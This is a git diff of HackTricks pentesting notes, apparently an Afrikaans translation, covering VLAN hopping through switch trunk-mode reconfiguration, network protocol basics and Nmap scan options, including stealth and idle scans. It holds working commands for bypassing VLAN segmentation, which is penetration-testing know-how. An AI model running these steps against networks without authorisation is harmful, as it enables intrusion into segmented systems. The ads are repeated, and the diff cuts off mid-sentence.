repo](https://github.com/carlospolop/hacktricks-cloud)**.
-If direct access to a switch is available, VLAN segmentation can be bypassed. This involves reconfiguring the connected port to trunk mode, establishing virtual interfaces for target VLANs, and setting IP addresses, either dynamically (DHCP) or statically, depending on the scenario (**for further details check [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).** +As direkte toegang tot 'n skakelaar beskikbaar is, kan VLAN-segmentering omseil word. Dit behels die herkonfigurering van die gekoppelde poort na stammodus, die vestiging van virtuele interfaces vir teikenvlans, en die instelling van IP-adresse, óf dinamies (DHCP) óf staties, afhangende van die scenario (**vir verdere besonderhede, sien [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).** -Initially, identification of the specific connected port is required. This can typically be accomplished through CDP messages, or by searching for the port via the **include** mask. - -**If CDP is not operational, port identification can be attempted by searching for the MAC address**: +Aanvanklik is identifikasie van die spesifieke gekoppelde poort vereis. Dit kan tipies bereik word deur CDP-boodskappe, of deur te soek na die poort via die **include**-masker. +**As CDP nie operasioneel is nie, kan poortidentifikasie probeer word deur te soek na die MAC-adres**: ``` SW1(config)# show mac address-table | include 0050.0000.0500 ``` - -Prior to switching to trunk mode, a list of existing VLANs should be compiled, and their identifiers determined. These identifiers are then assigned to the interface, enabling access to various VLANs through the trunk. The port in use, for instance, is associated with VLAN 10. - +Voor die oorskakeling na stammodus, moet 'n lys van bestaande VLAN's saamgestel word en hul identifiseerders bepaal word. Hierdie identifiseerders word dan toegewys aan die koppelvlak, wat toegang tot verskillende VLAN's deur die stam moontlik maak. Die gebruikte poort is byvoorbeeld geassosieer met VLAN 10. ``` SW1# show vlan brief ``` - -**Transitioning to trunk mode entails entering interface configuration mode**: - +**Oorgang na stammodus behels die ingang van die inteface-konfigurasie-modus**: ``` SW1(config)# interface GigabitEthernet 0/2 SW1(config-if)# switchport trunk encapsulation dot1q SW1(config-if)# switchport mode trunk ``` +Oorskakeling na stammodus sal tydelik konnektiwiteit onderbreek, maar dit kan later herstel word. -Switching to trunk mode will temporarily disrupt connectivity, but this can be restored subsequently. - -Virtual interfaces are then created, assigned VLAN IDs, and activated: - +Virtuele interfaces word dan geskep, VLAN-ID's toegewys en geaktiveer: ```bash sudo vconfig add eth0 10 sudo vconfig add eth0 20 @@ -50,38 +43,33 @@ sudo ifconfig eth0.20 up sudo ifconfig eth0.50 up sudo ifconfig eth0.60 up ``` - -Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured: - +Daarna word 'n adresversoek gedoen deur middel van DHCP. Alternatiewelik, in gevalle waar DHCP nie haalbaar is nie, kan adresse handmatig gekonfigureer word: ```bash sudo dhclient -v eth0.10 sudo dhclient -v eth0.20 sudo dhclient -v eth0.50 sudo dhclient -v eth0.60 ``` - -Example for manually setting a static IP address on an interface (VLAN 10): - +Voorbeeld vir die handmatige instelling van 'n statiese IP-adres op 'n koppelvlak (VLAN 10): ```bash sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0 ``` +Konnektiwiteit word getoets deur ICMP-versoeke na die verstekroetes vir VLANs 10, 20, 50 en 60 te begin. -Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60. +Uiteindelik maak hierdie proses dit moontlik om VLAN-segmentering te omseil, wat onbeperkte toegang tot enige VLAN-netwerk fasiliteer, en stel die verhoog vir daaropvolgende aksies. -Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions. - -## References +## Verwysings * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die [hacktricks-opslag](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-opslag](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index ee3672773..699f28e6c 100644 --- a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md @@ -1,78 +1,72 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
## Multicast DNS (mDNS) -The **mDNS** protocol is designed for IP address resolution within small, local networks without a dedicated name server. It operates by multicasting a query within the subnet, prompting the host with the specified name to respond with its IP address. All devices in the subnet can then update their mDNS caches with this information. +Die **mDNS**-protokol is ontwerp vir IP-adresoplossing binne klein, plaaslike netwerke sonder 'n toegewyde naambediener. Dit werk deur 'n navraag binne die subnet uit te stuur, wat die gasheer met die gespesifiseerde naam aanmoedig om met sy IP-adres te reageer. Alle toestelle in die subnet kan dan hul mDNS-cache met hierdie inligting opdateer. -Key points to note: -- **Domain Name Relinquishment**: A host can release its domain name by sending a packet with a TTL of zero. -- **Usage Restriction**: mDNS typically resolves names ending in **.local** only. Conflicts with non-mDNS hosts in this domain require network configuration adjustments. -- **Networking Details**: - - Ethernet multicast MAC addresses: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. - - IP addresses: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`. - - Operates over UDP port 5353. - - mDNS queries are confined to the local network and do not cross routers. +Belangrike punte om op te let: +- **Domeinnaamverlating**: 'n Gasheer kan sy domeinnaam vrylaat deur 'n pakkie met 'n TTL van nul te stuur. +- **Gebruiksbeperking**: mDNS los gewoonlik slegs name op wat eindig op **.local**. Konflikte met nie-mDNS-gasheerders in hierdie domein vereis netwerkkonfigurasie-aanpassings. +- **Netwerkdetails**: +- Ethernet-multicast-MAC-adresse: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. +- IP-adresse: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`. +- Werk oor UDP-poort 5353. +- mDNS-navrae is beperk tot die plaaslike netwerk en steek nie roetings nie. -## DNS-SD (Service Discovery) +## DNS-SD (Diensontdekking) -DNS-SD is a protocol for discovering services on a network by querying specific domain names (e.g., `_printers._tcp.local`). A response includes all related domains, such as available printers in this case. A comprehensive list of service types can be found [here](http://www.dns-sd.org/ServiceTypes.html). +DNS-SD is 'n protokol vir die ontdekking van dienste op 'n netwerk deur spesifieke domeinname te ondervra (bv. `_printers._tcp.local`). 'n Antwoord sluit alle verwante domeine in, soos beskikbare drukkers in hierdie geval. 'n Omvattende lys van dienssoorte kan [hier](http://www.dns-sd.org/ServiceTypes.html) gevind word. -## SSDP (Simple Service Discovery Protocol) +## SSDP (Eenvoudige Diensontdekkingsprotokol) -SSDP facilitates the discovery of network services and is primarily utilized by UPnP. It's a text-based protocol using UDP over port 1900, with multicast addressing. For IPv4, the designated multicast address is `239.255.255.250`. SSDP's foundation is [HTTPU](https://en.wikipedia.org/wiki/HTTPU), an extension of HTTP for UDP. +SSDP fasiliteer die ontdekking van netwerkdienste en word hoofsaaklik deur UPnP gebruik. Dit is 'n teksgebaseerde protokol wat UDP oor poort 1900 gebruik, met multicast-adressering. Vir IPv4 is die aangewese multicast-adres `239.255.255.250`. SSDP se grondslag is [HTTPU](https://en.wikipedia.org/wiki/HTTPU), 'n uitbreiding van HTTP vir UDP. -## Web Service for Devices (WSD) -Devices connected to a network can identify available services, like printers, through the Web Service for Devices (WSD). This involves broadcasting UDP packets. Devices seeking services send requests, while service providers announce their offerings. +## Webdiens vir Toestelle (WSD) +Toestelle wat aan 'n netwerk gekoppel is, kan beskikbare dienste, soos drukkers, identifiseer deur middel van die Webdiens vir Toestelle (WSD). Dit behels die uitsaai van UDP-pakkies. Toestelle wat dienste soek, stuur versoek, terwyl diensverskaffers hul aanbiedinge aankondig. ## OAuth 2.0 -OAuth 2.0 is a protocol facilitating secure, selective sharing of user information between services. For instance, it enables services to access user data from Google without multiple logins. The process involves user authentication, authorization by the user, and token generation by Google, allowing service access to the specified user data. +OAuth 2.0 is 'n protokol wat die veilige, selektiewe deling van gebruikersinligting tussen dienste fasiliteer. Dit maak dit byvoorbeeld moontlik vir dienste om toegang tot gebruikersdata van Google te verkry sonder veelvuldige aanmeldings. Die proses behels gebruikersverifikasie, magtiging deur die gebruiker, en token-generering deur Google, wat diens toegang tot die gespesifiseerde gebruikersdata moontlik maak. ## RADIUS -RADIUS (Remote Authentication Dial-In User Service) is a network access protocol primarily used by ISPs. It supports authentication, authorization, and accounting. User credentials are verified by a RADIUS server, potentially including network address verification for added security. Post-authentication, users receive network access and their session details are tracked for billing and statistical purposes. +RADIUS (Remote Authentication Dial-In User Service) is 'n netwerktoegangsprotokol wat hoofsaaklik deur internetdiensverskaffers gebruik word. Dit ondersteun verifikasie, magtiging en boekhouding. Gebruikerslegitimasie word geverifieer deur 'n RADIUS-bedieners, wat moontlik netwerkadresverifikasie vir bygevoegde sekuriteit kan insluit. Na verifikasie ontvang gebruikers netwerktoegang en word hul sessiebesonderhede vir fakturerings- en statistiese doeleindes gevolg. -## SMB and NetBIOS +## SMB en NetBIOS ### SMB (Server Message Block) -SMB is a protocol for sharing files, printers, and ports. It operates directly over TCP (port 445) or via NetBIOS over TCP (ports 137, 138). This dual compatibility enhances connectivity with various devices. +SMB is 'n protokol vir die deel van lêers, drukkers en poorte. Dit werk direk oor TCP (poort 445) of via NetBIOS oor TCP (poorte 137, 138). Hierdie dubbele verenigbaarheid verbeter die konnektiwiteit met verskillende toestelle. ### NetBIOS (Network Basic Input/Output System) -NetBIOS manages network sessions and connections for resource sharing. It supports unique names for devices and group names for multiple devices, enabling targeted or broadcast messaging. Communication can be connectionless (no acknowledgment) or connection-oriented (session-based). While NetBIOS traditionally operates over protocols like IPC/IPX, it's commonly used over TCP/IP. NetBEUI, an associated protocol, is known for its speed but was also quite verbose due to broadcasting. +NetBIOS bestuur netwerksessies en -verbindings vir die deling van hulpbronne. Dit ondersteun unieke name vir toestelle en groepname vir meervoudige toestelle, wat geteikende of uitsaai-boodskappe moontlik maak. Kommunikasie kan verbindingsloos (sonder bevestiging) of verbindingsgeoriënteerd (sessiegebaseerd) wees. Terwyl NetBIOS tradisioneel oor protokolle soos IPC/IPX werk, word dit algemeen oor TCP/IP gebruik. NetBEUI, 'n geassosieerde protokol, staan bekend om sy spoed, maar was ook nogal omslagtig as gevolg van uitsaai. ## LDAP (Lightweight Directory Access Protocol) -LDAP is a protocol enabling the management and access of directory information over TCP/IP. It supports various operations for querying and modifying directory information. Predominantly, it's utilized for accessing and maintaining distributed directory information services, allowing interaction with databases designed for LDAP communication. +LDAP is 'n protokol wat die bestuur en toegang tot gidsinligting oor TCP/IP moontlik maak. Dit ondersteun verskeie operasies vir die ondervraging en wysiging van gidsinligting. Dit word hoofsaaklik gebruik vir die toegang en instandhouding van verspreide gidsinligtingsdienste, wat interaksie met databasisse wat ontwerp is vir LDAP-kommunikasie moontlik maak. ## Active Directory (AD) -Active Directory is a network-accessible database containing objects like users, groups, privileges, and resources, facilitating centralized management of network entities. AD organizes its data into a hierarchical structure of domains, which can encompass servers, groups, and users. Subdomains allow further segmentation, each potentially maintaining its own server and user base. This structure centralizes user management, granting or restricting access to network resources. Queries can be made to retrieve specific information, like contact details, or to locate resources, like printers, within the domain. +Active Directory is 'n netwerktoeganklike databasis wat voorwerpe soos gebruikers, groepe, voorregte en hulpbronne bevat, wat die gesentraliseerde bestuur van netwerkentiteite fasiliteer. AD organiseer sy data in 'n hiërargiese struktuur van domeine, wat bedieners, groepe en gebruikers kan insluit. Subdomeine maak verdere segmentering moontlik, waarvan elkeen moontlik sy eie bediener en gebruikersbasis handhaaf. Hierdie struktuur sentraliseer gebruikersbestuur, wat toegang tot netwerkbronne verleen of beperk. Navrae kan gedoen word om spesifieke inligting, soos kontakbesonderhede, op te haal, of om hulpbronne, soos drukkers, binne die domein te vind.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! +Ander maniere om HackTricks te ondersteun: +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-op diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index 91ce4bd5b..40097e7df 100644 --- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -1,104 +1,87 @@ -# Nmap Summary (ESP) +# Nmap Opsomming (ESP)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- ``` nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 ``` - ## Parameters -### IPs to scan +### IP's om te skandeer -* **`,`:** Indicate the ips directly -* **`-iL `:** list\_IPs -* **`-iR `**: Number of random Ips, you can exclude possible Ips with `--exclude ` or `--excludefile `. +* **`,`:** Dui die IP's direk aan +* **`-iL `:** lys_IPs +* **`-iR `**: Aantal lukrake IP's, jy kan moontlike IP's uitsluit met `--exclude ` of `--excludefile `. -### Equipment discovery +### Toerusting ontdekking -By default Nmap launches a discovery phase consisting of: `-PA80 -PS443 -PE -PP` +Standaard lanceer Nmap 'n ontdekkingsfase wat bestaan uit: `-PA80 -PS443 -PE -PP` -* **`-sL`**: It is not invasive, it lists the targets making **DNS** requests to resolve names. It is useful to know if for example www.prueba.es/24 all Ips are our targets. -* **`-Pn`**: **No ping**. This is useful if you know that all of them are active (if not, you could lose a lot of time, but this option also produces false negatives saying that they are not active), it prevents the discovery phase. -* **`-sn`** : **No port scan**. After completing the reconnaissance phase, it does not scan ports. It is relatively stealthy, and allows a small network scan. With privileges it sends an ACK (-PA) to 80, a SYN(-PS) to 443 and an echo request and a Timestamp request, without privileges it always completes connections. If the target is the network, it only uses ARP(-PR). If used with another option, only the packets of the other option are dropped. -* **`-PR`**: **Ping ARP**. It is used by default when analyzing computers in our network, it is faster than using pings. If you do not want to use ARP packets use `--send-ip`. -* **`-PS `**: It sends SYN packets to which if it answers SYN/ACK it is open (to which it answers with RST so as not to end the connection), if it answers RST it is closed and if it does not answer it is unreachable. In case of not having privileges, a total connection is automatically used. If no ports are given, it throws it to 80. -* **`-PA `**: Like the previous one but with ACK, combining both of them gives better results. -* **`-PU `**: The objective is the opposite, they are sent to ports that are expected to be closed. Some firewalls only check TCP connections. If it is closed it is answered with port unreachable, if it is answered with another icmp or not answered it is left as destination unreachable. -* **`-PE, -PP, -PM`** : ICMP PINGS: echo replay, timestamp and addresmask. They are launched to find out if the target is active. -* **`-PY`**: Sends SCTP INIT probes to 80 by default, INIT-ACK(open) or ABORT(closed) or nothing or ICMP unreachable(inactive) can be replied. -* **`-PO `**: A protocol is indicated in the headers, by default 1(ICMP), 2(IGMP) and 4(Encap IP). For ICMP, IGMP, TCP (6) and UDP (17) protocols the protocol headers are sent, for the rest only the IP header is sent. The purpose of this is that due to the malformation of the headers, Protocol unreachable or responses of the same protocol are answered to know if it is up. -* **`-n`**: No DNS -* **`-R`**: DNS always +* **`-sL`**: Dit is nie indringend nie, dit lys die teikens deur **DNS** navrae te maak om name op te los. Dit is nuttig om te weet of byvoorbeeld www.prueba.es/24 al die IP's ons teikens is. +* **`-Pn`**: **Geen ping**. Dit is nuttig as jy weet dat almal aktief is (as nie, kan jy baie tyd verloor, maar hierdie opsie gee ook vals negatiewe resultate deur te sê dat hulle nie aktief is nie), dit voorkom die ontdekkingsfase. +* **`-sn`** : **Geen poort skandering**. Nadat die verkenningsfase voltooi is, skandeer dit nie poorte nie. Dit is relatief stil en maak 'n klein netwerk skandering moontlik. Met voorregte stuur dit 'n ACK (-PA) na 80, 'n SYN(-PS) na 443 en 'n echo versoek en 'n Timestamp versoek, sonder voorregte voltooi dit altyd verbindings. As die teiken die netwerk is, gebruik dit slegs ARP(-PR). As dit saam met 'n ander opsie gebruik word, word slegs die pakkies van die ander opsie laat val. +* **`-PR`**: **Ping ARP**. Dit word standaard gebruik wanneer rekenaars in ons netwerk geanaliseer word, dit is vinniger as om pings te gebruik. As jy nie ARP-pakkies wil gebruik nie, gebruik `--send-ip`. +* **`-PS `**: Dit stuur SYN-pakkies na poorte waarop as dit antwoord met SYN/ACK dit oop is (waarop dit met RST antwoord om die verbinding nie te beëindig nie), as dit met RST antwoord is dit gesluit en as dit nie antwoord nie is dit onbereikbaar. In die geval van geen voorregte word 'n totale verbinding outomaties gebruik. As geen poorte gegee word, stuur dit dit na 80. +* **`-PA `**: Soos die vorige een, maar met ACK, deur beide te kombineer gee dit beter resultate. +* **`-PU `**: Die doel is die teenoorgestelde, dit word gestuur na poorte wat verwag word om gesluit te wees. Sommige vuurmuure kyk slegs na TCP-verbindings. As dit gesluit is, word daar met 'n onbereikbare poort geantwoord, as daar met 'n ander ICMP geantwoord word of nie geantwoord word nie, word dit as 'n onbereikbare bestemming gelaat. +* **`-PE, -PP, -PM`** : ICMP PINGS: echo antwoord, tydmerk en adresmasker. Dit word geloods om uit te vind of die teiken aktief is. +* **`-PY`**: Stuur SCTP INIT sondes na 80 standaard, INIT-ACK(oop) of ABORT(gesluit) of niks of ICMP onbereikbaar(inaktief) kan geantwoord word. +* **`-PO `**: 'n Protokol word aangedui in die koppe, standaard 1(ICMP), 2(IGMP) en 4(Encap IP). Vir ICMP, IGMP, TCP (6) en UDP (17) protokolle word die protokol koppe gestuur, vir die res word slegs die IP-kop gestuur. Die doel hiervan is dat as gevolg van die misvorming van die koppe, Protokol onbereikbaar of antwoorde van dieselfde protokol geantwoord word om te weet of dit aktief is. +* **`-n`**: Geen DNS +* **`-R`**: DNS altyd -### Port scanning techniques +### Poort skandering tegnieke -* **`-sS`**: Does not complete the connection so it leaves no trace, very good if it can be used.(privileges) It is the one used by default. -* **`-sT`**: Completes the connection, so it does leave a trace, but it can be used for sure. By default without privileges. -* **`-sU`**: Slower, for UDP. Mostly: DNS(53), SNMP(161,162), DHCP(67 and 68), (-sU53,161,162,67,68): open(reply), closed(port unreachable), filtered (another ICMP), open/filtered (nothing). In case of open/filtered, -sV sends numerous requests to detect any of the versions that nmap supports and can detect the true state. It increases a lot the time. -* **`-sY`**: SCTP protocol fails to establish the connection, so there are no logs, works like -PY -* **`-sN,-sX,-sF`:** Null, Fin, Xmas, they can penetrate some firewalls and extract information. They are based on the fact that standard compliant machines should respond with RST all requests that do not have SYN, RST or ACK lags raised: open/filtered(nothing), closed(RST), filtered (ICMP unreachable). Unreliable on WIndows, CIsco, BSDI and OS/400. On unix yes. -* **`-sM`**: Maimon scan: Sends FIN and ACK flags, used for BSD, currently will return all as closed. -* **`-sA, sW`**: ACK and Window, is used to detect firewalls, to know if the ports are filtered or not. The -sW does distinguish between open/closed since the open ones respond with a different window value: open (RST with window other than 0), closed (RST window = 0), filtered (ICMP unreachable or nothing). Not all computers work this way, so if it is all closed, it is not working, if it is a few open, it is working fine, and if it is many open and few closed, it is working the other way around. -* **`-sI`:** Idle scan. For the cases in which there is an active firewall but we know that it does not filter to a certain Ip (or when we simply want anonymity) we can use the zombie scanner (it works for all the ports), to look for possible zombies we can use the scrpit ipidseq or the exploit auxiliary/scanner/ip/ipidseq. This scanner is based on the IPID number of the IP packets. -* **`--badsum`:** It sends the sum wrong, the computers would discard the packets, but the firewalls could answer something, it is used to detect firewalls. -* **`-sZ`:** "Weird" SCTP scanner, when sending probes with cookie echo fragments they should be dropped if open or responded with ABORT if closed. It can pass through firewalls that init does not pass through, the bad thing is that it does not distinguish between filtered and open. -* **`-sO`:** Protocol Ip scan. Sends bad and empty headers in which sometimes not even the protocol can be distinguished. If ICMP unreachable protocol arrives it is closed, if unreachable port arrives it is open, if another error arrives, filtered, if nothing arrives, open|filtered. -* **`-b `:** FTPhost--> It is used to scan a host from another one, this is done by connecting the ftp of another machine and asking it to send files to the ports that you want to scan from another machine, according to the answers we will know if they are open or not. \[\:\@]\\[:\] Almost all ftps servers no longer let you do this and therefore it is of little practical use. - -### **Centrar análisis** - -**-p:** Sirve para dar los puertos a escanear. Para seleccionar los 65335: **-p-** o **-p all**. Nmap tiene una clasificaación interna según su popularidad. Por defecto usa los 1000 ppales. Con **-F** (fast scan) analiza los 100 ppales. Con **--top-ports \** Analiza ese numero de ppales (de 1 hasta los 65335). Comprueba los puertos en orden aleatorio, para que eso no pase **-r**. También podemos seleccionar puertos: 20-30,80,443,1024- Esto ultimo significa que mire en adelante del 1024. También podemos agrupar los puertos por protocolos: U:53,T:21-25,80,139,S:9. También podemos escoger un rango dentro de los puertos populares de nmap: -p \[-1024] analiza hasta el 1024 de los incluidos en nmap-services. **--port-ratio \** Analiza los puertos más comúnes que un ratio que debe estar entre 0 y 1 - -**-sV** Escaneado de versión, se puede regular la intensidad de 0 a 9, por defecto 7. - -**--version-intensity \** Regulamos la intensidad, de forma que cuanto más bajo solo lanzará las sondas más probables, pero no todas. Con esto podemos acortar considerablemente el tiempo de escaneo UDP - -**-O** Deteccion de os - -**--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se da esta condición y hemos puesto esto, no intenta hacer predicción de os (ahorra tiempo) - -**--osscan-guess** Cuando la detección de os no es perfecta esto hace que se esfuerce más +* **`-sS`**: Voltooi nie die verbinding nie, so dit laat geen spoor agter nie, baie goed as dit gebruik kan word.(voorregte) Dit is die een wat standaard gebruik word. +* **`-sT`**: Voltooi die verbinding, so dit laat 'n spoor agter, maar dit kan veilig gebruik word. Standaard sonder voorregte. +* **`-sU`**: Stadiger, vir UDP. Meestal: DNS(53), SNMP(161,162), DHCP(67 en 68), (-sU53,161,162,67,68): oop(antwoord), gesluit(poort onbereikbaar), gefiltreer (ander ICMP), oop/gefiltreer (niks). In die geval van oop/gefiltreer, stuur -sV talle versoek om enige van die weergawes wat nmap ondersteun op te spoor en die ware toestand te bepaal. Dit verhoog die tyd aansienlik. +* **`-sY`**: SCTP-protokol slaag nie daarin om die verbinding te vestig nie, so daar is geen logboeke nie, werk soos -PY +* **`-sN,-sX,-sF`:** Null, Fin, Xmas, hulle kan deur sommige vuurmuure dring en inligting onttrek. Dit is gebaseer op die feit dat standaard voldoenende masjiene met RST op alle versoek wat nie SYN, RST of ACK vlae het nie moet antwoord: oop/gefiltreer(niks), gesluit(RST), gefiltreer (ICMP onbereikbaar). Onbetroubaar op Windows, CIsco, BSDI en OS/400. Op Unix wel. +* **`-sM`**: Maimon skandering: Stuur FIN- en ACK-vlae, gebruik vir BSD, tans sal dit alles as gesluit terugkeer. +* **`-sA, sW`**: ACK en Window, word gebruik om vuurmuure op te spoor, om te weet of die poorte gefiltreer word of nie. Die -sW onderskei tussen oop/gesluit aangesien die oop een met 'n ander vensterwaarde antwoord: oop (RST met venster anders as 0), gesluit 